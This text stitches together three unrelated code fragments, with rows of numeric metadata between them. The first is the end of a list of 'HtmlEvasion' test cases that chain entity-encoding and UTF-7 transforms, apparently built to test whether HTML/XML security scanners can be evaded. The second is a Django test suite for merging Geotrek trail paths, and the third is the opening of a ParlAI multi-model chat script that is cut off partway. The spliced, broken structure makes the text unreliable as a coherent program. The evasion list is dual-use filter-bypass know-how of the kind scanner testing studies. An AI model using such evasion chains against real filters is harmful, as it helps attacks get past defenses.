cases.append(TransformFunction("HtmlEvasion-html-711", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_hex))
cases.append(TransformFunction("HtmlEvasion-html-712", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-713", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-714", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities))
# cases.append(TransformFunction("HtmlEvasion-html-715", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_dec))
# cases.append(TransformFunction("HtmlEvasion-html-716", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_hex))
# cases.append(TransformFunction("HtmlEvasion-html-717", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_mix))
# cases.append(TransformFunction("HtmlEvasion-html-718", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_cdata))
# cases.append(TransformFunction("HtmlEvasion-html-719", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-720", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities))
# cases.append(TransformFunction("HtmlEvasion-html-721", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_mix,
# evasions.html.entity_encoding_cdata_mix))
# cases.append(TransformFunction("HtmlEvasion-html-722", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_internal_entities,
# evasions.html.entity_encoding_cdata_internal_entities))
cases.append(TransformFunction("HtmlEvasion-html-723", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-724", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-725", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-726", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entity,
# evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-727", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-728", None, parsed_as_xml_case, evasions.html.entity_encoding_attributes_internal_entities, evasions.html.entity_encoding_cdata_internal_entities, evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity)) # crashes IE
cases.append(TransformFunction("HtmlEvasion-html-729", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-730", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity,
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities))
cases.append(TransformFunction("HtmlEvasion-html-731", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_root_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-732", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_root_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-733", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_internal_entities,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-734", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix))
cases.append(TransformFunction("HtmlEvasion-html-735", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2)
))
cases.append(TransformFunction("HtmlEvasion-html-736", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2),
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
number_of_nested=1730)
))
# data url + ... + entity_encoding_internal_parameter_entity_declaration_mix -> too large value ?
cases.append(TransformFunction("HtmlEvasion-html-737", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2),
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
number_of_nested=1730),
evasions.html.entity_encoding_internal_parameter_entity_declaration_mix
))
cases.append(TransformFunction("HtmlEvasion-html-738", None, cases[-1], evasions.html.http_declared_utf_7_encoded_as_utf_7_5_i))
# description cleanup
if not long_descriptions:
TransformFunction.cleanup_descriptions(cases, simple_index)
return OrderedDict([(c.name, c) for c in cases])
| 100.307832
| 300
| 0.740453
| 6,522
| 55,069
| 5.800981
| 0.067464
| 0.136702
| 0.190199
| 0.26492
| 0.95097
| 0.924697
| 0.907543
| 0.90424
| 0.899561
| 0.885209
| 0
| 0.028404
| 0.176578
| 55,069
| 548
| 301
| 100.490876
| 0.805954
| 0.146816
| 0
| 0.369347
| 0
| 0
| 0.097968
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002513
| false
| 0
| 0.007538
| 0
| 0.012563
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
07e1e86e2ff4a5866e3c70fac945f410b524054f
| 20,626
|
py
|
Python
|
geotrek/core/tests/test_path_merge.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 50
|
2016-10-19T23:01:21.000Z
|
2022-03-28T08:28:34.000Z
|
geotrek/core/tests/test_path_merge.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 1,422
|
2016-10-27T10:39:40.000Z
|
2022-03-31T13:37:10.000Z
|
geotrek/core/tests/test_path_merge.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 46
|
2016-10-27T10:59:10.000Z
|
2022-03-22T15:55:56.000Z
|
from unittest import skipIf
from django.conf import settings
from django.contrib.gis.geos import LineString, Point
from django.test import TestCase
from django.urls import reverse
from mapentity.factories import SuperUserFactory
from geotrek.core.factories import PathFactory, TopologyFactory, \
PathAggregationFactory
from geotrek.core.models import PathAggregation, Topology
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
class MergePathTest(TestCase):
def setUp(self):
    """Create a superuser and authenticate the test client as them."""
    user = SuperUserFactory.create()
    self.user = user
    self.client.force_login(user)
def test_path_merge_without_snap(self):
    """
    A B C D A D
    |---------| + |---------| --> |------------------|
    Test five cases : 1 - A match with C : unification D-C-A-B
    2 - A match with D : unification C-D-A-B
    3 - B match with C : unification A-B-C-D
    4 - B match with D : unification A-B-D-C
    5 - no match : no unification
    """
    # All four matching orientations must yield the same unified geometry.
    unified = LineString((0, 0), (4, 0), (8, 0), srid=settings.SRID)

    def merge_and_check(first, second):
        # Merge must succeed, unify the geometry and sum the lengths.
        first_length = first.length
        second_length = second.length
        self.assertEqual(first.merge_path(second), True)
        self.assertEqual(first.geom, unified)
        self.assertEqual(first.length, first_length + second_length)

    # Case 1: B matches C (paths drawn A->B and C->D).
    ab = PathFactory.create(name="PATH_AB", geom=LineString((0, 0), (4, 0)))
    cd = PathFactory.create(name="PATH_CD", geom=LineString((4, 0), (8, 0)))
    merge_and_check(ab, cd)
    ab.delete()
    cd.delete()

    # Case 2: AB reversed.
    ab = PathFactory.create(name="path_AB", geom=LineString((4, 0), (0, 0)))
    cd = PathFactory.create(name="path_CD", geom=LineString((4, 0), (8, 0)))
    merge_and_check(ab, cd)
    ab.delete()
    cd.delete()

    # Case 3: both reversed.
    ab = PathFactory.create(name="path_AB", geom=LineString((4, 0), (0, 0)))
    cd = PathFactory.create(name="path_CD", geom=LineString((8, 0), (4, 0)))
    merge_and_check(ab, cd)
    ab.delete()
    cd.delete()

    # Case 4: CD reversed.
    ab = PathFactory.create(name="path_AB", geom=LineString((0, 0), (4, 0)))
    cd = PathFactory.create(name="path_CD", geom=LineString((8, 0), (4, 0)))
    merge_and_check(ab, cd)

    # Case 5: disjoint paths must not merge; length stays untouched.
    ab = PathFactory.create(name="PATH_AB", geom=LineString((0, 0), (4, 0)))
    cd = PathFactory.create(name="PATH_CD", geom=LineString((50, 0), (100, 0)))
    untouched_length = ab.length
    self.assertEqual(ab.merge_path(cd), False)
    self.assertEqual(ab.length, untouched_length)
def test_path_merge_with_snap(self):
    """
    A B C D A D
    |---------| + |---------| --> |------------------|
    Test five cases : 1 - A match with C : unification D-C-A-B
    2 - A match with D : unification C-D-A-B
    3 - B match with C : unification A-B-C-D
    4 - B match with D : unification A-B-D-C
    5 - no match : no unification
    """
    # Endpoints are one unit apart, so unification relies on snapping;
    # every matching orientation ends up with the same geometry.
    unified = LineString((0, 0), (15, 0), (16, 0), (30, 0), srid=settings.SRID)
    orientations = [
        ("PATH_AB", LineString((0, 0), (15, 0)), "PATH_CD", LineString((16, 0), (30, 0))),
        ("path_AB", LineString((15, 0), (0, 0)), "path_CD", LineString((16, 0), (30, 0))),
        ("path_AB", LineString((15, 0), (0, 0)), "path_CD", LineString((30, 0), (16, 0))),
        ("path_AB", LineString((0, 0), (15, 0)), "path_CD", LineString((30, 0), (16, 0))),
    ]
    for first_name, first_geom, second_name, second_geom in orientations:
        first = PathFactory.create(name=first_name, geom=first_geom)
        second = PathFactory.create(name=second_name, geom=second_geom)
        self.assertEqual(first.merge_path(second), True)
        self.assertEqual(first.geom, unified)
        first.delete()
        second.delete()

    # Case 5: endpoints too far apart to snap -> merge refused.
    first = PathFactory.create(name="PATH_AB", geom=LineString((0, 0), (5, 0)))
    second = PathFactory.create(name="PATH_CD", geom=LineString((50, 0), (100, 0)))
    self.assertEqual(first.merge_path(second), False)
def test_path_merge_with_other_path_next_ws(self):
    """
    F
    |
    |
    E
    A---------------B + C-------------------D
    Do not merge !
    """
    # A third path (EF) also touches the junction point, so the merge
    # must be refused; merge_path signals this case with 2.
    left = PathFactory.create(name="PATH_AB", geom=LineString((0, 1), (10, 1)))
    right = PathFactory.create(name="PATH_CD", geom=LineString((10, 1), (20, 1)))
    PathFactory.create(name="PATH_EF", geom=LineString((10, 1), (10, 5)))
    self.assertEqual(left.merge_path(right), 2)
def test_recompute_pk_no_reverse(self):
    """
    A---------------B + C-------------------D A----------------BC----------------D
    | | |--| | => | | |--| |
    E1 (0.2) | E3 (0.2, 0.3) | E1 (0.1) | E3 (0.6, 0.65) E4 (0.9)
    E2 (0.6) E4 (0.8) E2 (0.3)
    In case of AB == CD, matching B and C

    After the merge, aggregation positions on AB must be rescaled by
    old_AB_length / new_length, and positions on CD rescaled and shifted
    past the former AB segment.
    """
    path_AB = PathFactory.create(name="PATH_AB", geom=LineString((0, 1), (10, 1)))
    path_CD = PathFactory.create(name="PATH_CD", geom=LineString((10, 1), (20, 1)))
    e1 = TopologyFactory.create(geom=Point(2, 2))
    a1 = PathAggregationFactory.create(path=path_AB, topo_object=e1)
    e2 = TopologyFactory.create(geom=Point(6, 1))
    a2 = PathAggregationFactory.create(path=path_AB, topo_object=e2)
    e3 = TopologyFactory.create(geom=LineString((2, 1), (3, 1),))
    a3 = PathAggregationFactory.create(path=path_CD, topo_object=e3)
    e4 = TopologyFactory.create(geom=Point(8, 2))
    a4 = PathAggregationFactory.create(path=path_CD, topo_object=e4)
    path_AB_original_length = path_AB.length
    path_CD_original_length = path_CD.length
    path_AB.merge_path(path_CD)
    self.assertEqual(path_AB.geom, LineString((0, 1), (10, 1), (20, 1), srid=settings.SRID))
    # reload updated objects
    a1_updated = PathAggregation.objects.get(pk=a1.pk)
    a2_updated = PathAggregation.objects.get(pk=a2.pk)
    a3_updated = PathAggregation.objects.get(pk=a3.pk)
    a4_updated = PathAggregation.objects.get(pk=a4.pk)
    # test pk recompute on path_1 : new pk = old pk * old_path_1_length / new_path_1_length
    self.assertEqual(a1_updated.start_position, a1.start_position * (path_AB_original_length / path_AB.length))
    self.assertEqual(a1_updated.end_position, a1.end_position * (path_AB_original_length / path_AB.length))
    self.assertEqual(a2_updated.start_position, a2.start_position * (path_AB_original_length / path_AB.length))
    # Fixed copy-paste typo: a2_updated was compared against a1.end_position.
    self.assertEqual(a2_updated.end_position, a2.end_position * (path_AB_original_length / path_AB.length))
    # test pk recompute on path_2 : new pk = old pk * old_path_2_length / new_path_1_length + old_path_1_length / new_path_1_length
    self.assertEqual(a3_updated.start_position, a3.start_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a3_updated.end_position, a3.end_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a4_updated.start_position, a4.start_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a4_updated.end_position, a4.end_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
def test_path_aggregation(self):
    """
    A---------------B + C-------------------D A-----------------BC----------------D
    |---------------------| |------------------|
    E1 E1
    2 path aggregations
    """
    path_AB = PathFactory.create(name="PATH_AB", geom=LineString((0, 1), (10, 1)))
    path_CD = PathFactory.create(name="PATH_CD", geom=LineString((10, 1), (20, 1)))
    # One topology spanning the end of AB and the start of CD.
    topology = TopologyFactory.create(paths=[(path_AB, 0.5, 1), (path_CD, 0, 0.5)])
    path_AB.merge_path(path_CD)
    self.assertEqual(path_AB.geom, LineString((0, 1), (10, 1), (20, 1), srid=settings.SRID))
    # Both aggregations survive the merge and still belong to the topology.
    aggregations = PathAggregation.objects
    self.assertEqual(aggregations.filter(topo_object=topology).count(), 2)
    self.assertEqual(aggregations.count(), 2)
    head = aggregations.first()
    tail = aggregations.last()
    # Positions are rescaled onto the unified (twice as long) path.
    self.assertEqual((head.start_position, head.end_position), (0.25, 0.5))
    self.assertEqual((tail.start_position, tail.end_position), (0.5, 0.75))
    self.assertEqual(Topology.objects.count(), 1)
def test_recompute_pk_reverse_AB(self):
    """
    A---------------B + C-------------------D B-----------------AC----------------D
    | | |--| | => | | |--| |
    E1 (0.2) | E3 (0.2, 0.3) | | E1 (0.4) E3 (0.6, 0.65) E4 (0.9)
    E2 (0.6) E4 (0.8) E2 (0.2)
    In case of AB == CD, matching A and C

    AB is drawn reversed, so its aggregation positions are mirrored
    (1 - pk) before rescaling; CD positions are rescaled and shifted.
    The topology offset on the reversed path flips sign.
    """
    path_AB = PathFactory.create(name="PATH_AB", geom=LineString((10, 1), (0, 1)))
    path_CD = PathFactory.create(name="PATH_CD", geom=LineString((10, 1), (20, 1)))
    e1 = TopologyFactory.create(geom=Point(2, 2))
    a1 = PathAggregationFactory.create(path=path_AB, topo_object=e1)
    e2 = TopologyFactory.create(geom=Point(6, 1))
    a2 = PathAggregationFactory.create(path=path_AB, topo_object=e2)
    e3 = TopologyFactory.create(geom=LineString((2, 1), (3, 1),))
    a3 = PathAggregationFactory.create(path=path_CD, topo_object=e3)
    e4 = TopologyFactory.create(geom=Point(8, 2))
    a4 = PathAggregationFactory.create(path=path_CD, topo_object=e4)
    path_AB_original_length = path_AB.length
    path_CD_original_length = path_CD.length
    path_AB.merge_path(path_CD)
    self.assertEqual(path_AB.geom, LineString((0, 1), (10, 1), (20, 1), srid=settings.SRID))
    # reload updated objects
    a1_updated = PathAggregation.objects.get(pk=a1.pk)
    a2_updated = PathAggregation.objects.get(pk=a2.pk)
    a3_updated = PathAggregation.objects.get(pk=a3.pk)
    a4_updated = PathAggregation.objects.get(pk=a4.pk)
    # test pk recompute on path_1 : new pk = old pk * old_path_1_length / new_path_1_length
    self.assertEqual(a1_updated.start_position, (1 - a1.start_position) * (path_AB_original_length / path_AB.length))
    self.assertEqual(a1_updated.end_position, (1 - a1.end_position) * (path_AB_original_length / path_AB.length))
    self.assertEqual(a2_updated.start_position, (1 - a2.start_position) * (path_AB_original_length / path_AB.length))
    # Fixed copy-paste typo: a2_updated was compared against a1.end_position.
    self.assertEqual(a2_updated.end_position, (1 - a2.end_position) * (path_AB_original_length / path_AB.length))
    # test pk recompute on path_2 : new pk = old pk * old_path_2_length / new_path_1_length + old_path_1_length / new_path_1_length
    self.assertEqual(a3_updated.start_position, a3.start_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a3_updated.end_position, a3.end_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a4_updated.start_position, a4.start_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a4_updated.end_position, a4.end_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    # test offset changes
    e1_updated = Topology.objects.get(pk=e1.pk)
    self.assertEqual(e1_updated.offset, -e1.offset)
def test_recompute_pk_reverse_CD(self):
    """
    A---------------B + C-------------------D A----------------BD----------------C
    | | |--| | => | | | |--|
    E1 (0.2) | E3 (0.2, 0.3) | E1 (0.1) | | E3 (0.8, 0.9)
    E2 (0.6) E4 (0.8) E2 (0.3) E4 (0.6)
    In case of AB == CD, matching B and D

    CD is drawn reversed, so its aggregation positions are mirrored
    (1 - pk) before rescaling and shifting; AB positions are only
    rescaled.  The topology offset on the reversed path flips sign.
    """
    path_AB = PathFactory.create(name="PATH_AB", geom=LineString((0, 1), (10, 1)))
    path_CD = PathFactory.create(name="PATH_CD", geom=LineString((20, 1), (10, 1)))
    e1 = TopologyFactory.create(geom=Point(2, 2))
    a1 = PathAggregationFactory.create(path=path_AB, topo_object=e1)
    e2 = TopologyFactory.create(geom=Point(6, 1))
    a2 = PathAggregationFactory.create(path=path_AB, topo_object=e2)
    e3 = TopologyFactory.create(geom=LineString((2, 1), (3, 1),))
    a3 = PathAggregationFactory.create(path=path_CD, topo_object=e3)
    e4 = TopologyFactory.create(geom=Point(8, 2))
    a4 = PathAggregationFactory.create(path=path_CD, topo_object=e4)
    path_AB_original_length = path_AB.length
    path_CD_original_length = path_CD.length
    path_AB.merge_path(path_CD)
    self.assertEqual(path_AB.geom, LineString((0, 1), (10, 1), (20, 1), srid=settings.SRID))
    # reload updated objects
    a1_updated = PathAggregation.objects.get(pk=a1.pk)
    a2_updated = PathAggregation.objects.get(pk=a2.pk)
    a3_updated = PathAggregation.objects.get(pk=a3.pk)
    a4_updated = PathAggregation.objects.get(pk=a4.pk)
    # test pk recompute on path_1 : new pk = old pk * old_path_1_length / new_path_1_length
    self.assertEqual(a1_updated.start_position, a1.start_position * (path_AB_original_length / path_AB.length))
    self.assertEqual(a1_updated.end_position, a1.end_position * (path_AB_original_length / path_AB.length))
    self.assertEqual(a2_updated.start_position, a2.start_position * (path_AB_original_length / path_AB.length))
    # Fixed copy-paste typo: a2_updated was compared against a1.end_position.
    self.assertEqual(a2_updated.end_position, a2.end_position * (path_AB_original_length / path_AB.length))
    # test pk recompute on path_2 : new pk = old pk * old_path_2_length / new_path_1_length + old_path_1_length / new_path_1_length
    self.assertEqual(a3_updated.start_position, (1 - a3.start_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a3_updated.end_position, (1 - a3.end_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a4_updated.start_position, (1 - a4.start_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a4_updated.end_position, (1 - a4.end_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    # test offset changes
    e4_updated = Topology.objects.get(pk=e4.pk)
    self.assertEqual(e4_updated.offset, -e4.offset)
def test_recompute_pk_reverse_AB_CD(self):
    """
    A---------------B + C-------------------D             B----------------AD----------------C
        |        |           |--|       |        =>           |           |        |--|
        E1 (0.2) |           E3 (0.2, 0.3)   |                    E1 (0.4)    |        E3 (0.8, 0.9)
                 E2 (0.6)                E4 (0.8)                         E2 (0.2)             E4 (0.6)
    In case of AB == CD, matching A and D
    """
    # Both paths are drawn "backwards" (decreasing x) so the merge has to
    # reverse them before concatenating.
    path_AB = PathFactory.create(name="PATH_AB", geom=LineString((10, 1), (0, 1)))
    path_CD = PathFactory.create(name="PATH_CD", geom=LineString((20, 1), (10, 1)))
    e1 = TopologyFactory.create(geom=Point(2, 2))
    a1 = PathAggregationFactory.create(path=path_AB, topo_object=e1)
    e2 = TopologyFactory.create(geom=Point(6, 1))
    a2 = PathAggregationFactory.create(path=path_AB, topo_object=e2)
    e3 = TopologyFactory.create(geom=LineString((2, 1), (3, 1),))
    a3 = PathAggregationFactory.create(path=path_CD, topo_object=e3)
    e4 = TopologyFactory.create(geom=Point(8, 2))
    a4 = PathAggregationFactory.create(path=path_CD, topo_object=e4)
    path_AB_original_length = path_AB.length
    path_CD_original_length = path_CD.length
    path_AB.merge_path(path_CD)
    self.assertEqual(path_AB.geom, LineString((0, 1), (10, 1), (20, 1), srid=settings.SRID))
    # reload updated objects
    a1_updated = PathAggregation.objects.get(pk=a1.pk)
    a2_updated = PathAggregation.objects.get(pk=a2.pk)
    a3_updated = PathAggregation.objects.get(pk=a3.pk)
    a4_updated = PathAggregation.objects.get(pk=a4.pk)
    # test pk recompute on path_1 : new pk = old pk * old_path_1_length / new_path_1_length
    # (positions are first flipped with 1 - pk because path_AB was reversed)
    self.assertEqual(a1_updated.start_position, (1 - a1.start_position) * (path_AB_original_length / path_AB.length))
    self.assertEqual(a1_updated.end_position, (1 - a1.end_position) * (path_AB_original_length / path_AB.length))
    self.assertEqual(a2_updated.start_position, (1 - a2.start_position) * (path_AB_original_length / path_AB.length))
    # FIX: compared against a1.end_position before (copy-paste error); a2's own
    # end position is the value that must be recomputed here.
    self.assertEqual(a2_updated.end_position, (1 - a2.end_position) * (path_AB_original_length / path_AB.length))
    # test pk recompute on path_2 : new pk = old pk * old_path_2_length / new_path_1_length + old_path_1_length / new_path_1_length
    self.assertEqual(a3_updated.start_position, (1 - a3.start_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a3_updated.end_position, (1 - a3.end_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a4_updated.start_position, (1 - a4.start_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    self.assertEqual(a4_updated.end_position, (1 - a4.end_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
    # test offset changes: reversing a path flips the sign of lateral offsets
    e1_updated = Topology.objects.get(pk=e1.pk)
    self.assertEqual(e1_updated.offset, -e1.offset)
    e4_updated = Topology.objects.get(pk=e4.pk)
    self.assertEqual(e4_updated.offset, -e4.offset)
def test_response_is_json(self):
    """The merge-path endpoint must answer with a JSON content type."""
    url = reverse('core:merge_path')
    response = self.client.post(url)
    self.assertEqual('application/json', response.get('Content-Type'))
| 53.574026
| 164
| 0.616746
| 2,785
| 20,626
| 4.318492
| 0.050628
| 0.087304
| 0.080818
| 0.085308
| 0.908705
| 0.903218
| 0.894654
| 0.892824
| 0.882597
| 0.869211
| 0
| 0.04331
| 0.237661
| 20,626
| 384
| 165
| 53.713542
| 0.721572
| 0.179385
| 0
| 0.794521
| 0
| 0
| 0.018837
| 0
| 0
| 0
| 0
| 0
| 0.324201
| 1
| 0.045662
| false
| 0
| 0.03653
| 0
| 0.086758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07e61ed751b336ab4aff7fddfcd495c7904bfaaa
| 26,630
|
py
|
Python
|
parlai/scripts/imperial_quips.py
|
shigailowa/ParlAI
|
5bb359cdacb8f2b92ba482273cdff20f0d147a72
|
[
"MIT"
] | null | null | null |
parlai/scripts/imperial_quips.py
|
shigailowa/ParlAI
|
5bb359cdacb8f2b92ba482273cdff20f0d147a72
|
[
"MIT"
] | null | null | null |
parlai/scripts/imperial_quips.py
|
shigailowa/ParlAI
|
5bb359cdacb8f2b92ba482273cdff20f0d147a72
|
[
"MIT"
] | null | null | null |
from parlai.core.params import ParlaiParser
from parlai.core.agents import create_agent
from parlai.core.worlds import create_task
from parlai.core.script import ParlaiScript, register_script
from parlai.utils.world_logging import WorldLogger
from parlai.agents.local_human.local_human import LocalHumanAgent
import parlai.utils.logging as logging
import personalise_message
from parlai.core.build_data import modelzoo_path
from parlai.core.params import get_model_name
import random
class ImperialQuipWorld():
    """Fan-out world: forwards one human utterance to several models and
    collects one reply suggestion per model.

    Removed the redundant class-level ``human_agent``/``models``/
    ``models_labels`` attributes: they were always shadowed by the
    instance attributes set in ``__init__``.
    """

    def __init__(self, human_agent, models, models_labels):
        # models_labels must have one label per model (used for display).
        self.human_agent = human_agent
        self.models = models
        self.models_labels = models_labels

    def parley(self):
        """Run one exchange: get a human act, show every model's reply.

        Returns:
            list of str: one suggestion text per model, in model order.
        """
        human_input = self.human_agent.act()
        suggestions = []
        for model in self.models:
            model.observe(human_input)
            suggestion = model.act()
            suggestions.append(suggestion['text'])
        print("ImperialQuips suggestions:")
        # enumerate/zip instead of indexing; output is byte-identical.
        for i, (label, text) in enumerate(zip(self.models_labels, suggestions), start=1):
            print(str(i) + "." + label + ": " + text)
        return suggestions
# python parlai/scripts/interactive.py -mf zoo:pretrained_transformers/model_poly/model -t convai2
#opt_convai = {'init_opt': None, 'task': 'convai2', 'download_path': '/home/tatiana/ParlAI/downloads', 'loglevel': 'success', 'datatype': 'train', 'image_mode': 'raw', 'hide_labels': False, 'multitask_weights': [1], 'batchsize': 1, 'dynamic_batching': None, 'datapath': '/home/tatiana/ParlAI/data', 'model': None, 'model_file': '/home/tatiana/ParlAI/data/models/pretrained_transformers/model_poly/model', 'init_model': None, 'dict_class': 'parlai.core.dict:DictionaryAgent', 'display_examples': False, 'display_prettify': False, 'display_ignore_fields': 'label_candidates,text_candidates', 'interactive_task': True, 'outfile': '', 'save_format': 'conversations', 'local_human_candidates_file': None, 'single_turn': False, 'log_keep_fields': 'all', 'image_size': 256, 'image_cropsize': 224, 'interactive_mode': True, 'embedding_type': 'random', 'embedding_projection': 'random', 'fp16': False, 'fp16_impl': 'apex', 'force_fp16_tokens': False, 'optimizer': 'adamax', 'learningrate': 0.0001, 'gradient_clip': 0.1, 'adam_eps': 1e-08, 'adafactor_eps': (1e-30, 0.001), 'momentum': 0, 'nesterov': True, 'nus': (0.7,), 'betas': (0.9, 0.999), 'weight_decay': None, 'rank_candidates': False, 'truncate': 1024, 'text_truncate': None, 'label_truncate': None, 'history_reversed': False, 'history_size': -1, 'person_tokens': False, 'split_lines': False, 'use_reply': 'label', 'add_p1_after_newln': False, 'delimiter': '\n', 'history_add_global_end_token': None, 'special_tok_lst': None, 'gpu': -1, 'no_cuda': False, 'lr_scheduler': 'reduceonplateau', 'lr_scheduler_patience': 3, 'lr_scheduler_decay': 0.5, 'max_lr_steps': -1, 'invsqrt_lr_decay_gamma': -1, 'warmup_updates': -1, 'warmup_rate': 0.0001, 'update_freq': 1, 'candidates': 'inline', 'eval_candidates': 'inline', 'interactive_candidates': 'fixed', 'repeat_blocking_heuristic': True, 'fixed_candidates_path': None, 'fixed_candidate_vecs': 'reuse', 'encode_candidate_vecs': True, 'encode_candidate_vecs_batchsize': 256, 'train_predict': False, 
